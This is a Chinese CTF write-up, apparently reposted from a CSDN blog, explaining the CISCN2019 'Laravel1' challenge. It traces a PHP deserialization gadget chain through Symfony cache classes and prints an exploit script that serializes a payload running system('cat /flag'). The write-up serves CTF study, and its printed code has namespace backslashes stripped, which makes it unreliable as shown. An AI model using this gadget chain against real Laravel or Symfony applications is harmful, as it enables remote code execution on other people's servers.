[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解

admin 2022年4月25日23:09:47CTF专场评论8 views1006字阅读3分21秒阅读模式

[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解

[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解

界面如上,比较单一:

指出了反序列化的点:还有备份文件。

下面反序列化的入口:

[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解

就当找到了吧:

[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解

确实可以跳转:

[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解

可控:

[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解

寻找这个类,看是否被调用:

[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解

[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解

开始寻找使用了saveDeferred类的:

看别人的WP这个是唯一可以使用的:

[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解

调用了本类的initialise方法,但前文并没有定义,据其他WP说是会去父类找,

偷一张其继承关系的图:

[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解

查询得到其主要父类,尝试全局搜索initialise()

[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解

include可以使用:

[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解

那么在之前的那个PhpArrayAdapter.php中定义好$this->file,只要其存在就能包含出来:

贴exp:

<?php
namespace SymfonyComponentCacheAdapter;
class TagAwareAdapter{ public $deferred = array(); function __construct($x){ $this->pool = $x; }}
class ProxyAdapter{ protected $setInnerItem = 'system';}
namespace SymfonyComponentCache;
class CacheItem{ protected $innerItem = 'cat /flag';}
$a = new SymfonyComponentCacheAdapterTagAwareAdapter(new SymfonyComponentCacheAdapterProxyAdapter());$a->deferred = array('aa'=>new SymfonyComponentCacheCacheItem);echo urlencode(serialize($a));


使用:

还有问题未解决,等待了解:理解的太浅显了:

[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解


原文来自CSDN博主「F1gh4」|侵删




[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解

[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解


中电运行是专业专注培养能源企业IT工匠和提供IT整体解决方案的服务商,也是能源互联网安全专家。

为方便大家沟通,中电运行开通“中电运行交流群”,诚挚欢迎能源企业和相关人士,以及对网络安全感兴趣的群体加入本群,真诚交流,互相学习[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解。想加入我们就给我们留言吧[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解

[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解

[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解

小白必读!寰宇卫士手把手教你栈溢出(上)

手把手教你栈溢出(中)

手把手教你栈溢出(下)

《信息安全知识》之法律关键常识汇总

CTF经验分享|带你入门带你飞!

[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解


原文始发于微信公众号(寰宇卫士):[CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月25日23:09:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  [CISCN2019 总决赛 Day1 Web4]Laravel1-解题步骤详解 http://cn-sec.com/archives/942151.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: